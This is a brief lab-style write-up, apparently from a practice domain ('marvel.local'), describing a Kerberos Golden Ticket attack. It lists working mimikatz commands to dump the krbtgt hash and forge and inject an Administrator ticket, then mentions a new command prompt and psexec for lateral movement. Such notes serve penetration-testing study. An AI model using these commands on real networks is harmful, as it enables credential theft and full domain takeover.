Golden Ticket Attack

To perform this attack, we need the krbtgt hash. When we are successful in golden ticket attack, we have full control over entire domain.

I enumerated the SID and NTLM hash for kbtgt: lsadump::lsa /inject /name:krbtgt

Then I created a Golden Ticket: kerberos::golden /User:Administrator /domain:marvel.local /sid:S-1-5-21-2171057704-3879275708-2899333543 /krbtgt:955ad34fdcb7752df007b34b3aa2ed00 /id:500 /ptt

Once the golden ticket was created, I issued the following command which launched a new command prompt instance: misc::cmd

From this new instance of command prompt, I can enumerate other machines connected to the domain. I can even use the psexec tool.

Last updated

Was this helpful?